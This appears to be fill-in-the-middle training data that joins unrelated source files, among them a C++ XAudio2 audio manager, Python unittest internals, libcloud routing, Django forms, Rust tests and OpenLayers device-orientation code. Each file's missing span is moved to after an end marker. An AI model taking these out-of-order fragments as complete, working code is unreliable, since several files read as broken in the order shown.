OutputDebugStringA( szBuffer );
return false;
}
}
data->paused = pause;
return true;
}
//*************************************************************//
//*************************************************************//
// STOP VOICE
bool AudioManager::StopVoice( HVoice& handle )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::StopVoice - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return false;
assert( handle != SGD::INVALID_HANDLE && "AudioManager::StopVoice - invalid handle" );
if( handle == SGD::INVALID_HANDLE )
return false;
// Get the voice info from the handle manager
VoiceInfo* data = m_VoiceManager.GetData( handle );
assert( data != nullptr && "AudioManager::StopVoice - handle has expired" );
if( data == nullptr )
return false;
// Stop the voice
HRESULT hResult = data->voice->Stop( 0 );
if( FAILED( hResult ) )
{
// MESSAGE
char szBuffer[ 128 ];
_snprintf_s( szBuffer, 128, _TRUNCATE, "!!! AudioManager::StopVoice - failed to stop voice (0x%X) !!!\n", hResult );
OutputDebugStringA( szBuffer );
return false;
}
// Destroy the voice
data->voice->DestroyVoice();
data->voice = nullptr;
// Find all voices with the audio handle
VoiceMap::_Paircc range = m_mVoices.equal_range( data->audio );
for( VoiceMap::const_iterator iter = range.first; iter != range.second; ++iter )
{
// Remove this voice handle
if( iter->second == handle )
{
m_mVoices.erase( iter );
break;
}
}
// Remove the voice info from the handle manager
m_VoiceManager.RemoveData( handle, nullptr );
// Invalidate the handle
handle = SGD::INVALID_HANDLE;
return true;
}
//*************************************************************//
//*************************************************************//
// GET VOICE VOLUME
int AudioManager::GetVoiceVolume( HVoice handle )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::GetVoiceVolume - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return 0;
assert( handle != SGD::INVALID_HANDLE && "AudioManager::GetVoiceVolume - invalid handle" );
if( handle == SGD::INVALID_HANDLE )
return 0;
// Get the voice info from the handle manager
VoiceInfo* data = m_VoiceManager.GetData( handle );
assert( data != nullptr && "AudioManager::GetVoiceVolume - handle has expired" );
if( data == nullptr )
return 0;
// Scale 0 -> +100 (account for floating point error)
float fVolume = 0.0f;
data->voice->GetVolume( &fVolume );
return (int)(fVolume * 100.0f + 0.5f);
}
//*************************************************************//
//*************************************************************//
// SET VOICE VOLUME
bool AudioManager::SetVoiceVolume( HVoice handle, int value )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::SetVoiceVolume - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return false;
assert( handle != SGD::INVALID_HANDLE && "AudioManager::SetVoiceVolume - invalid handle" );
if( handle == SGD::INVALID_HANDLE )
return false;
// Get the voice info from the handle manager
VoiceInfo* data = m_VoiceManager.GetData( handle );
assert( data != nullptr && "AudioManager::SetVoiceVolume - handle has expired" );
if( data == nullptr )
return false;
// Cap the range 0->100
if( value < 0 )
value = 0;
else if( value > 100 )
value = 100;
float fVolume = value / 100.0f; // scaled to 0 -> +1
HRESULT hResult = data->voice->SetVolume( fVolume );
if( FAILED( hResult ) )
return false;
return true;
}
//*************************************************************//
//*************************************************************//
// GET AUDIO VOLUME
int AudioManager::GetAudioVolume( HAudio handle )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::GetAudioVolume - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return 0;
assert( handle != SGD::INVALID_HANDLE && "AudioManager::GetAudioVolume - invalid handle" );
if( handle == SGD::INVALID_HANDLE )
return 0;
// Get the audio info from the handle manager
AudioInfo* data = m_HandleManager.GetData( handle );
assert( data != nullptr && "AudioManager::GetAudioVolume - handle has expired" );
if( data == nullptr )
return 0;
// Scale 0 -> +100 (account for floating point error)
return (int)(data->fVolume * 100.0f + 0.5f);
}
//*************************************************************//
//*************************************************************//
// SET AUDIO ATTRIBUTE
bool AudioManager::SetAudioVolume( HAudio handle, int value )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::SetAudioVolume - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return false;
assert( handle != SGD::INVALID_HANDLE && "AudioManager::SetAudioVolume - invalid handle" );
if( handle == SGD::INVALID_HANDLE )
return false;
// Get the audio info from the handle manager
AudioInfo* data = m_HandleManager.GetData( handle );
assert( data != nullptr && "AudioManager::SetAudioVolume - handle has expired" );
if( data == nullptr )
return false;
// Cap the range 0->100
if( value < 0 )
value = 0;
else if( value > 100 )
value = 100;
data->fVolume = value / 100.0f; // scaled to 0 -> +1
// Set active voices' volume
bool success = true;
std::pair< VoiceMap::const_iterator, VoiceMap::const_iterator > rangePair = m_mVoices.equal_range( handle );
for( VoiceMap::const_iterator iter = rangePair.first; iter != rangePair.second; ++iter )
{
// Get the voice info from the handle manager
VoiceInfo* info = m_VoiceManager.GetData( iter->second );
assert( info != nullptr && "AudioManager::SetAudioVolume - voice handle has expired" );
if( info == nullptr )
continue;
HRESULT hResult = info->voice->SetVolume( data->fVolume );
if( FAILED( hResult ) )
success = false;
}
return success;
}
//*************************************************************//
//*************************************************************//
// XAudio2 file input
// - MSDN http://msdn.microsoft.com/en-us/library/windows/desktop/ee415781%28v=vs.85%29.aspx
#ifdef _XBOX // Big-Endian
enum ECharacterCode
{
E_CC_RIFF = 'RIFF',
E_CC_DATA = 'data',
E_CC_FMT = 'fmt ',
E_CC_WAVE = 'WAVE',
E_CC_XWMA = 'XWMA',
E_CC_DPDS = 'dpds'
};
#else // Little-Endian
enum ECharacterCode
{
E_CC_RIFF = 'FFIR',
E_CC_DATA = 'atad',
E_CC_FMT = ' tmf',
E_CC_WAVE = 'EVAW',
E_CC_XWMA = 'AMWX',
E_CC_DPDS = 'sdpd'
};
#endif
/*static*/ HRESULT AudioManager::FindChunk( HANDLE hFile, DWORD fourcc, DWORD& dwChunkSize, DWORD& dwChunkDataPosition )
{
HRESULT hResult = S_OK;
if( INVALID_SET_FILE_POINTER == SetFilePointer( hFile, 0, NULL, FILE_BEGIN ) )
return HRESULT_FROM_WIN32( GetLastError() );
DWORD dwChunkType;
DWORD dwChunkDataSize;
DWORD dwRIFFDataSize = 0;
DWORD dwFileType;
DWORD bytesRead = 0;
DWORD dwOffset = 0;
while( hResult == S_OK )
{
DWORD dwRead;
if( 0 == ReadFile( hFile, &dwChunkType, sizeof(DWORD), &dwRead, NULL ) )
hResult = HRESULT_FROM_WIN32( GetLastError() );
if( 0 == ReadFile( hFile, &dwChunkDataSize, sizeof(DWORD), &dwRead, NULL ) )
hResult = HRESULT_FROM_WIN32( GetLastError() );
switch( dwChunkType )
{
case E_CC_RIFF:
dwRIFFDataSize = dwChunkDataSize;
dwChunkDataSize = 4;
if( 0 == ReadFile( hFile, &dwFileType, sizeof(DWORD), &dwRead, NULL ) )
hResult = HRESULT_FROM_WIN32( GetLastError() );
break;
default:
if( INVALID_SET_FILE_POINTER == SetFilePointer( hFile, dwChunkDataSize, NULL, FILE_CURRENT ) )
return HRESULT_FROM_WIN32( GetLastError() );
}
dwOffset += sizeof(DWORD) * 2;
if( dwChunkType == fourcc )
{
dwChunkSize = dwChunkDataSize;
dwChunkDataPosition = dwOffset;
return S_OK;
}
dwOffset += dwChunkDataSize;
if( bytesRead >= dwRIFFDataSize )
return S_FALSE;
}
return S_OK;
}
/*static*/ HRESULT AudioManager::ReadChunkData( HANDLE hFile, void* buffer, DWORD buffersize, DWORD bufferoffset )
{
HRESULT hResult = S_OK;
if( INVALID_SET_FILE_POINTER == SetFilePointer( hFile, bufferoffset, NULL, FILE_BEGIN ) )
return HRESULT_FROM_WIN32( GetLastError() );
DWORD dwRead;
if( 0 == ReadFile( hFile, buffer, buffersize, &dwRead, NULL ) )
hResult = HRESULT_FROM_WIN32( GetLastError() );
return hResult;
}
/*static*/ HRESULT AudioManager::LoadAudio( const wchar_t* filename, WAVEFORMATEXTENSIBLE& wfx, XAUDIO2_BUFFER& buffer, XAUDIO2_BUFFER_WMA& bufferWMA )
{
// Open the file
HANDLE hFile = CreateFileW( filename, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL );
if( hFile == INVALID_HANDLE_VALUE )
return HRESULT_FROM_WIN32( GetLastError() );
if( SetFilePointer( hFile, 0, NULL, FILE_BEGIN ) == INVALID_SET_FILE_POINTER )
return HRESULT_FROM_WIN32( GetLastError() );
// Check the file type, should be 'WAVE' or 'XWMA'
DWORD dwChunkSize;
DWORD dwChunkPosition;
FindChunk( hFile, E_CC_RIFF, dwChunkSize, dwChunkPosition );
DWORD filetype;
ReadChunkData( hFile, &filetype, sizeof(DWORD), dwChunkPosition );
if( filetype == E_CC_WAVE || filetype == E_CC_XWMA )
{
// Fill out the WAVEFORMATEXTENSIBLE structure with the contents of the FMT chunk.
FindChunk( hFile, E_CC_FMT, dwChunkSize, dwChunkPosition );
ReadChunkData( hFile, &wfx, dwChunkSize, dwChunkPosition );
// Read the contents of the DATA chunk into the audio data buffer
FindChunk( hFile, E_CC_DATA, dwChunkSize, dwChunkPosition );
BYTE* pDataBuffer = new BYTE[ dwChunkSize ];
ReadChunkData( hFile, pDataBuffer, dwChunkSize, dwChunkPosition );
// Fill the XAUDIO2_BUFFER
buffer.AudioBytes = dwChunkSize; // size of the audio buffer in bytes
buffer.pAudioData = pDataBuffer; // buffer containing audio data
buffer.Flags = XAUDIO2_END_OF_STREAM; // tell the source voice not to expect any data after this buffer
// Fill the wma buffer if necessary
if( filetype == E_CC_XWMA )
{
// Read the contents of the DPDS chunk into the wma data buffer
FindChunk( hFile, E_CC_DPDS, dwChunkSize, dwChunkPosition );
UINT32 nPackets = (dwChunkSize + (sizeof(UINT32)-1)) / sizeof(UINT32); // round size to number of DWORDS
UINT32* pWmaDataBuffer = new UINT32[ nPackets ];
ReadChunkData( hFile, pWmaDataBuffer, dwChunkSize, dwChunkPosition );
// Fill the XAUDIO2_BUFFER_WMA
bufferWMA.PacketCount = nPackets; // size of the audio buffer in DWORDS
bufferWMA.pDecodedPacketCumulativeBytes = pWmaDataBuffer; // buffer containing wma data
}
return S_OK;
}
else
{
return E_UNEXPECTED;
}
}
//*************************************************************//
//*************************************************************//
// FIND AUDIO BY NAME
/*static*/ bool AudioManager::FindAudioByName( Handle handle, AudioInfo& data, SearchInfo* extra )
{
// Compare the names
if( wcscmp( data.wszFilename, extra->filename ) == 0 )
{
// Audio does exist!
extra->audio = &data;
extra->handle = handle;
return false;
}
// Did not find yet
return true;
}
//*************************************************************//
} // namespace SGD_IMPLEMENTATION
} // namespace SGD<|fim▁end|> | |
<|file_name|>stack-info.component.spec.ts<|end_file_name|><|fim▁begin|>import { async, ComponentFixture, TestBed } from '@angular/core/testing';
import { StackInfoComponent } from './stack-info.component';
describe('StackInfoComponent', () => {
let component: StackInfoComponent;
let fixture: ComponentFixture<StackInfoComponent>;
beforeEach(async(() => {
TestBed.configureTestingModule({
declarations: [ StackInfoComponent ]
})
.compileComponents();
}));
beforeEach(() => {
fixture = TestBed.createComponent(StackInfoComponent);
component = fixture.componentInstance;
fixture.detectChanges();
});
<|fim▁hole|><|fim▁end|> | it('should be created', () => {
expect(component).toBeTruthy();
});
}); |
<|file_name|>result.py<|end_file_name|><|fim▁begin|>"""Test result object"""
import os
import sys
import traceback
from StringIO import StringIO
from . import util
from functools import wraps
__unittest = True
def failfast(method):
@wraps(method)
def inner(self, *args, **kw):
if getattr(self, 'failfast', False):
self.stop()
return method(self, *args, **kw)
return inner
STDOUT_LINE = '\nStdout:\n%s'
STDERR_LINE = '\nStderr:\n%s'
class TestResult(object):
"""Holder for test result information.
Test results are automatically managed by the TestCase and TestSuite
classes, and do not need to be explicitly manipulated by writers of tests.
Each instance holds the total number of tests run, and collections of
failures and errors that occurred among those test runs. The collections
contain tuples of (testcase, exceptioninfo), where exceptioninfo is the
formatted traceback of the error that occurred.
"""
_previousTestClass = None
_testRunEntered = False
_moduleSetUpFailed = False
def __init__(self, stream=None, descriptions=None, verbosity=None):
self.failfast = False
self.failures = []
self.errors = []
self.testsRun = 0
self.skipped = []
self.expectedFailures = []
self.unexpectedSuccesses = []
self.shouldStop = False
self.buffer = False
self._stdout_buffer = None
self._stderr_buffer = None
self._original_stdout = sys.stdout
self._original_stderr = sys.stderr
self._mirrorOutput = False
def printErrors(self):
"Called by TestRunner after test run"
def startTest(self, test):
"Called when the given test is about to be run"
self.testsRun += 1
self._mirrorOutput = False
self._setupStdout()
def _setupStdout(self):
if self.buffer:
if self._stderr_buffer is None:
self._stderr_buffer = StringIO()
self._stdout_buffer = StringIO()
sys.stdout = self._stdout_buffer
sys.stderr = self._stderr_buffer
def startTestRun(self):
"""Called once before any tests are executed.
See startTest for a method called before each test.
"""
def stopTest(self, test):
"""Called when the given test has been run"""
self._restoreStdout()
self._mirrorOutput = False
def _restoreStdout(self):
if self.buffer:
if self._mirrorOutput:
output = sys.stdout.getvalue()
error = sys.stderr.getvalue()
if output:
if not output.endswith('\n'):
output += '\n'
self._original_stdout.write(STDOUT_LINE % output)
if error:
if not error.endswith('\n'):
error += '\n'
self._original_stderr.write(STDERR_LINE % error)
sys.stdout = self._original_stdout
sys.stderr = self._original_stderr
self._stdout_buffer.seek(0)
self._stdout_buffer.truncate()
self._stderr_buffer.seek(0)
self._stderr_buffer.truncate()
def stopTestRun(self):
"""Called once after all tests are executed.
See stopTest for a method called after each test.
"""
@failfast
def addError(self, test, err):
"""Called when an error has occurred. 'err' is a tuple of values as
returned by sys.exc_info().
"""
self.errors.append((test, self._exc_info_to_string(err, test)))
self._mirrorOutput = True
@failfast
def addFailure(self, test, err):
"""Called when an error has occurred. 'err' is a tuple of values as
returned by sys.exc_info()."""
self.failures.append((test, self._exc_info_to_string(err, test)))
self._mirrorOutput = True
def addSuccess(self, test):
"Called when a test has completed successfully"
pass
def addSkip(self, test, reason):
"""Called when a test is skipped."""
self.skipped.append((test, reason))
def addExpectedFailure(self, test, err):
"""Called when an expected failure/error occurred."""
self.expectedFailures.append(
(test, self._exc_info_to_string(err, test)))
@failfast
def addUnexpectedSuccess(self, test):
"""Called when a test was expected to fail, but succeed."""
self.unexpectedSuccesses.append(test)
def wasSuccessful(self):
"Tells whether or not this result was a success"
return len(self.failures) == len(self.errors) == 0
def stop(self):
"Indicates that the tests should be aborted"
self.shouldStop = True
def _exc_info_to_string(self, err, test):<|fim▁hole|> exctype, value, tb = err
# Skip test runner traceback levels
while tb and self._is_relevant_tb_level(tb):
tb = tb.tb_next
if exctype is test.failureException:
# Skip assert*() traceback levels
length = self._count_relevant_tb_levels(tb)
msgLines = traceback.format_exception(exctype, value, tb, length)
else:
msgLines = traceback.format_exception(exctype, value, tb)
if self.buffer:
output = sys.stdout.getvalue()
error = sys.stderr.getvalue()
if output:
if not output.endswith('\n'):
output += '\n'
msgLines.append(STDOUT_LINE % output)
if error:
if not error.endswith('\n'):
error += '\n'
msgLines.append(STDERR_LINE % error)
return ''.join(msgLines)
def _is_relevant_tb_level(self, tb):
return '__unittest' in tb.tb_frame.f_globals
def _count_relevant_tb_levels(self, tb):
length = 0
while tb and not self._is_relevant_tb_level(tb):
length += 1
tb = tb.tb_next
return length
def __repr__(self):
return ("<%s run=%i errors=%i failures=%i>" %
(util.strclass(self.__class__), self.testsRun, len(self.errors),
len(self.failures)))<|fim▁end|> | """Converts a sys.exc_info()-style tuple of values into a string.""" |
<|file_name|>.eslintrc.js<|end_file_name|><|fim▁begin|>module.exports = {
root: true,
env: {
node: true,
},
extends: ['plugin:vue/essential', '@vue/prettier', '@vue/typescript'],
rules: {
'vue/max-attributes-per-line': 'off',
'vue/html-self-closing': 'off',
},
parserOptions: {
parser: '@typescript-eslint/parser',<|fim▁hole|><|fim▁end|> | },
} |
<|file_name|>ball_to_polyline.rs<|end_file_name|><|fim▁begin|>use na::Pnt2;
use na;
use math::Scalar;
use entities::shape::Ball2;
use procedural::Polyline2;
use procedural;
use super::ToPolyline;
impl<N: Scalar> ToPolyline<Pnt2<N>, u32> for Ball2<N> {
fn to_polyline(&self, nsubdiv: u32) -> Polyline2<N> {<|fim▁hole|>
procedural::circle(&diameter, nsubdiv)
}
}<|fim▁end|> | let diameter = self.radius() * na::cast(2.0f64); |
<|file_name|>TestSRILM.java<|end_file_name|><|fim▁begin|>package edu.stanford.nlp.lm;
import java.io.File;
import java.util.Arrays;
/**
* This is a simple test of srilm.
* @author Alexandre Denis<|fim▁hole|> */
public class TestSRILM
{
/**
* @param args
*/
public static void main(String[] args)
{
SRILanguageModel model = new SRILanguageModel(new File("resources/ranking/lm-genia-lemma"), 3);
System.out.println(model.getSentenceLogProb(Arrays.asList("the central nucleotide be proportional to the size of the vacuole".split(" "))));
System.out.println(model.getSentenceLogProb(Arrays.asList("the be size to the nucleotide vacuole central the proportional to".split(" "))));
}
}<|fim▁end|> | * |
<|file_name|>g.py<|end_file_name|><|fim▁begin|># coding=utf-8
"""g[ravity] class."""
from foamfile import FoamFile, foam_file_from_file
from collections import OrderedDict<|fim▁hole|>class G(FoamFile):
"""G (gravity) class."""
# set default valus for this class
__default_values = OrderedDict()
__default_values['dimensions'] = '[0 1 -2 0 0 0 0]'
__default_values['#include'] = None
__default_values['value'] = '(0 0 -9.81)'
def __init__(self, values=None):
"""Init class."""
FoamFile.__init__(self, name='g',
cls='uniformDimensionedVectorField',
location='constant',
default_values=self.__default_values,
values=values)
@classmethod
def from_file(cls, filepath):
"""Create a FoamFile from a file.
Args:
filepath: Full file path to dictionary.
"""
return cls(values=foam_file_from_file(filepath, cls.__name__))
@property
def dimensions(self):
return self.values['dimensions']
@property
def value(self):
"""Gravity vector."""
return eval(self.values['value'].replace(' ', ','))
@value.setter
def value(self, vec):
"""Set gravity vector."""
assert len(vec) == 3, \
ValueError('Gravity vector must be a tuple with 3 values.')
self.values['value'] = '({})'.format(' '.join((str(v) for v in vec)))<|fim▁end|> | |
<|file_name|>prelink.py<|end_file_name|><|fim▁begin|>#!/bin/python
import os, subprocess
import logging
from autotest.client import test
from autotest.client.shared import error, software_manager
sm = software_manager.SoftwareManager()
class prelink(test.test):
"""
Autotest module for testing basic functionality
of prelink
@author Athira Rajeev <[email protected]><|fim▁hole|> """
version = 1
nfail = 0
path = ''
def initialize(self, test_path=''):
"""
Sets the overall failure counter for the test.
"""
self.nfail = 0
for package in ['gcc', 'gcc-c++']:
if not sm.check_installed(package):
logging.debug("%s missing - trying to install", package)
sm.install(package)
ret_val = subprocess.Popen(['make', 'all'], cwd="%s/prelink" %(test_path))
ret_val.communicate()
if ret_val.returncode != 0:
self.nfail += 1
logging.info('\n Test initialize successfully')
def run_once(self, test_path=''):
"""
Trigger test run
"""
try:
os.environ["LTPBIN"] = "%s/shared" %(test_path)
ret_val = subprocess.Popen(['./prelink.sh'], cwd="%s/prelink" %(test_path))
ret_val.communicate()
if ret_val.returncode != 0:
self.nfail += 1
except error.CmdError, e:
self.nfail += 1
logging.error("Test Failed: %s", e)
def postprocess(self):
if self.nfail != 0:
logging.info('\n nfails is non-zero')
raise error.TestError('\nTest failed')
else:
logging.info('\n Test completed successfully ')<|fim▁end|> | |
<|file_name|>urls.py<|end_file_name|><|fim▁begin|># -*- coding:utf-8 -*-
from werkzeug.routing import Map, Submount
import libcloud
from libcloud_rest.api.handlers import app_handler
from libcloud_rest.api.handlers.compute import compute_handler<|fim▁hole|>from libcloud_rest.api.handlers.storage import storage_handler
from libcloud_rest.api.versions import versions
api_version = '/%s' % (versions[libcloud.__version__])
urls = Map([
app_handler.get_rules(),
Submount(api_version, [
compute_handler.get_rules(),
dns_handler.get_rules(),
lb_handler.get_rules(),
storage_handler.get_rules(),
])
])<|fim▁end|> | from libcloud_rest.api.handlers.dns import dns_handler
from libcloud_rest.api.handlers.loadbalancer import lb_handler |
<|file_name|>forms.py<|end_file_name|><|fim▁begin|>from django import forms
from poi_manager.models import Poi, PoiCategory
from mptt.forms import TreeNodeChoiceField
class PoiCategoryForm(forms.ModelForm):
cat_name = forms.CharField(max_length=128, help_text="Please enter the category name.")
parent = TreeNodeChoiceField(queryset=PoiCategory.objects.all(), required=False)
class Meta:
model = PoiCategory<|fim▁hole|>class PoiForm(forms.ModelForm):
name = forms.CharField(max_length=128, help_text="Please enter the title of the page.")
floor_num = forms.IntegerField(initial=0, required=False)
category = TreeNodeChoiceField(queryset=PoiCategory.objects.all())
class Meta:
model = Poi
fields = ('name', 'floor_num', 'category',)<|fim▁end|> | fields = ('cat_name', 'parent',)
|
<|file_name|>deprecation-sanity.rs<|end_file_name|><|fim▁begin|>// Various checks that deprecation attributes are used correctly
mod bogus_attribute_types_1 {
#[deprecated(since = "a", note = "a", reason)] //~ ERROR unknown meta item 'reason'
fn f1() { }
<|fim▁hole|> fn f2() { }
#[deprecated(since, note = "a")] //~ ERROR incorrect meta item
fn f3() { }
#[deprecated(since = "a", note(b))] //~ ERROR incorrect meta item
fn f5() { }
#[deprecated(since(b), note = "a")] //~ ERROR incorrect meta item
fn f6() { }
#[deprecated(note = b"test")] //~ ERROR literal in `deprecated` value must be a string
fn f7() { }
#[deprecated("test")] //~ ERROR item in `deprecated` must be a key/value pair
fn f8() { }
}
#[deprecated(since = "a", note = "b")]
#[deprecated(since = "a", note = "b")] //~ ERROR multiple deprecated attributes
fn multiple1() { }
#[deprecated(since = "a", since = "b", note = "c")] //~ ERROR multiple 'since' items
fn f1() { }
struct X;
#[deprecated = "hello"] //~ ERROR this `#[deprecated]` annotation has no effect
impl Default for X {
fn default() -> Self {
X
}
}
fn main() { }<|fim▁end|> | #[deprecated(since = "a", note)] //~ ERROR incorrect meta item |
<|file_name|>entry.rs<|end_file_name|><|fim▁begin|>use consts::*;
#[derive(Copy, Clone, Debug, PartialEq, Eq, PartialOrd, Ord)]
pub struct Entry {
pub cell: u8,
pub num: u8,
}
impl Entry {
#[inline] pub fn cell(self) -> usize { self.cell as usize }
#[inline] pub fn row(self) -> u8 { self.cell as u8 / 9 }
#[inline] pub fn col(self) -> u8 { self.cell as u8 % 9 }
#[inline] pub fn field(self) -> u8 { self.row() / 3 * 3 + self.col() / 3 }
#[inline] pub fn num(self) -> u8 { self.num }<|fim▁hole|> #[inline]
pub fn conflicts_with(self, other: Self) -> bool {
self.cell() == other.cell() ||
(self.num == other.num &&
( self.row() == other.row()
|| self.col() == other.col()
|| self.field() == other.field()
)
)
}
#[inline] pub fn num_offset(self) -> usize { self.num() as usize - 1 }
#[inline] pub fn row_constraint(self) -> usize { self.row() as usize * 9 + self.num_offset() }
#[inline] pub fn col_constraint(self) -> usize { self.col() as usize * 9 + self.num_offset() + COL_OFFSET }
#[inline] pub fn field_constraint(self) -> usize { self.field() as usize * 9 + self.num_offset() + FIELD_OFFSET }
#[inline] pub fn cell_constraint(self) -> usize { self.cell() + CELL_OFFSET }
#[inline] pub fn constrains(self, constraint_nr: usize) -> bool {
constraint_nr == match constraint_nr {
0...80 => self.row_constraint(),
81...161 => self.col_constraint(),
162...242 => self.field_constraint(),
243...323 => self.cell_constraint(),
_ => unreachable!(),
}
}
}<|fim▁end|> | |
<|file_name|>loading.js<|end_file_name|><|fim▁begin|><|fim▁hole|><|fim▁end|> | //>>built
define("dijit/nls/da/loading",({loadingState:"Indlæser...",errorState:"Der er opstået en fejl"})); |
<|file_name|>deviceorientation.js<|end_file_name|><|fim▁begin|>goog.provide('ol.DeviceOrientation');
goog.provide('ol.DeviceOrientationProperty');
goog.require('goog.events');
goog.require('goog.math');
goog.require('ol.Object');
goog.require('ol.has');
/**
* @enum {string}
*/
ol.DeviceOrientationProperty = {
ALPHA: 'alpha',
BETA: 'beta',
GAMMA: 'gamma',
HEADING: 'heading',
TRACKING: 'tracking'
};
/**
* @classdesc
* The ol.DeviceOrientation class provides access to DeviceOrientation
* information and events, see the [HTML 5 DeviceOrientation Specification](
* http://www.w3.org/TR/orientation-event/) for more details.
*
* Many new computers, and especially mobile phones
* and tablets, provide hardware support for device orientation. Web
* developers targetting mobile devices will be especially interested in this
* class.
*
* Device orientation data are relative to a common starting point. For mobile
* devices, the starting point is to lay your phone face up on a table with the
* top of the phone pointing north. This represents the zero state. All
* angles are then relative to this state. For computers, it is the same except
* the screen is open at 90 degrees.
*
* Device orientation is reported as three angles - `alpha`, `beta`, and
* `gamma` - relative to the starting position along the three planar axes X, Y
* and Z. The X axis runs from the left edge to the right edge through the
* middle of the device. Similarly, the Y axis runs from the bottom to the top
* of the device through the middle. The Z axis runs from the back to the front
* through the middle. In the starting position, the X axis points to the
* right, the Y axis points away from you and the Z axis points straight up
* from the device lying flat.
*
* The three angles representing the device orientation are relative to the
* three axes. `alpha` indicates how much the device has been rotated around the
* Z axis, which is commonly interpreted as the compass heading (see note
* below). `beta` indicates how much the device has been rotated around the X
* axis, or how much it is tilted from front to back. `gamma` indicates how
* much the device has been rotated around the Y axis, or how much it is tilted
* from left to right.
*
* For most browsers, the `alpha` value returns the compass heading so if the
* device points north, it will be 0. With Safari on iOS, the 0 value of
* `alpha` is calculated from when device orientation was first requested.
* ol.DeviceOrientation provides the `heading` property which normalizes this
* behavior across all browsers for you.
*
* It is important to note that the HTML 5 DeviceOrientation specification
* indicates that `alpha`, `beta` and `gamma` are in degrees while the
* equivalent properties in ol.DeviceOrientation are in radians for consistency
* with all other uses of angles throughout OpenLayers.
*
* @see http://www.w3.org/TR/orientation-event/
*
* @constructor
* @extends {ol.Object}
* @fires change Triggered when the device orientation changes.
* @param {olx.DeviceOrientationOptions=} opt_options Options.
* @api
*/
ol.DeviceOrientation = function(opt_options) {
goog.base(this);
var options = goog.isDef(opt_options) ? opt_options : {};
/**
* @private
* @type {goog.events.Key}
*/
this.listenerKey_ = null;
goog.events.listen(this,
ol.Object.getChangeEventType(ol.DeviceOrientationProperty.TRACKING),
this.handleTrackingChanged_, false, this);
this.setTracking(goog.isDef(options.tracking) ? options.tracking : false);
};
goog.inherits(ol.DeviceOrientation, ol.Object);
/**
* @inheritDoc
*/
ol.DeviceOrientation.prototype.disposeInternal = function() {
this.setTracking(false);
goog.base(this, 'disposeInternal');
};
/**
* @private
* @param {goog.events.BrowserEvent} browserEvent Event.
*/
ol.DeviceOrientation.prototype.orientationChange_ = function(browserEvent) {
var event = /** @type {DeviceOrientationEvent} */
(browserEvent.getBrowserEvent());
if (goog.isDefAndNotNull(event.alpha)) {
var alpha = goog.math.toRadians(event.alpha);
this.set(ol.DeviceOrientationProperty.ALPHA, alpha);
// event.absolute is undefined in iOS.
if (goog.isBoolean(event.absolute) && event.absolute) {
this.set(ol.DeviceOrientationProperty.HEADING, alpha);
} else if (goog.isDefAndNotNull(event.webkitCompassHeading) &&
goog.isDefAndNotNull(event.webkitCompassAccuracy) &&
event.webkitCompassAccuracy != -1) {
var heading = goog.math.toRadians(event.webkitCompassHeading);
this.set(ol.DeviceOrientationProperty.HEADING, heading);
}
}
if (goog.isDefAndNotNull(event.beta)) {
this.set(ol.DeviceOrientationProperty.BETA,
goog.math.toRadians(event.beta));
}
if (goog.isDefAndNotNull(event.gamma)) {
this.set(ol.DeviceOrientationProperty.GAMMA,
goog.math.toRadians(event.gamma));
}
this.dispatchChangeEvent();
};
/**
* @return {number|undefined} The euler angle in radians of the device from the
* standard Z axis.
* @observable
* @api
*/
ol.DeviceOrientation.prototype.getAlpha = function() {
return /** @type {number|undefined} */ (
this.get(ol.DeviceOrientationProperty.ALPHA));
};
goog.exportProperty(
ol.DeviceOrientation.prototype,
'getAlpha',
ol.DeviceOrientation.prototype.getAlpha);
/**
* @return {number|undefined} The euler angle in radians of the device from the
* planar X axis.
* @observable
* @api
*/
ol.DeviceOrientation.prototype.getBeta = function() {
return /** @type {number|undefined} */ (
this.get(ol.DeviceOrientationProperty.BETA));
};
goog.exportProperty(
ol.DeviceOrientation.prototype,
<|fim▁hole|>
/**
* @return {number|undefined} The euler angle in radians of the device from the
* planar Y axis.
* @observable
* @api
*/
ol.DeviceOrientation.prototype.getGamma = function() {
return /** @type {number|undefined} */ (
this.get(ol.DeviceOrientationProperty.GAMMA));
};
goog.exportProperty(
ol.DeviceOrientation.prototype,
'getGamma',
ol.DeviceOrientation.prototype.getGamma);
/**
* @return {number|undefined} The heading of the device relative to north, in
* radians, normalizing for different browser behavior.
* @observable
* @api
*/
ol.DeviceOrientation.prototype.getHeading = function() {
return /** @type {number|undefined} */ (
this.get(ol.DeviceOrientationProperty.HEADING));
};
goog.exportProperty(
ol.DeviceOrientation.prototype,
'getHeading',
ol.DeviceOrientation.prototype.getHeading);
/**
* Are we tracking the device's orientation?
* @return {boolean} The status of tracking changes to alpha, beta and gamma.
* If true, changes are tracked and reported immediately.
* @observable
* @api
*/
ol.DeviceOrientation.prototype.getTracking = function() {
return /** @type {boolean} */ (
this.get(ol.DeviceOrientationProperty.TRACKING));
};
goog.exportProperty(
ol.DeviceOrientation.prototype,
'getTracking',
ol.DeviceOrientation.prototype.getTracking);
/**
* @private
*/
ol.DeviceOrientation.prototype.handleTrackingChanged_ = function() {
if (ol.has.DEVICE_ORIENTATION) {
var tracking = this.getTracking();
if (tracking && goog.isNull(this.listenerKey_)) {
this.listenerKey_ = goog.events.listen(goog.global, 'deviceorientation',
this.orientationChange_, false, this);
} else if (!tracking && !goog.isNull(this.listenerKey_)) {
goog.events.unlistenByKey(this.listenerKey_);
this.listenerKey_ = null;
}
}
};
/**
* Enable or disable tracking of DeviceOrientation events.
* @param {boolean} tracking The status of tracking changes to alpha, beta and
* gamma. If true, changes are tracked and reported immediately.
* @observable
* @api
*/
ol.DeviceOrientation.prototype.setTracking = function(tracking) {
this.set(ol.DeviceOrientationProperty.TRACKING, tracking);
};
goog.exportProperty(
ol.DeviceOrientation.prototype,
'setTracking',
ol.DeviceOrientation.prototype.setTracking);<|fim▁end|> | 'getBeta',
ol.DeviceOrientation.prototype.getBeta);
|
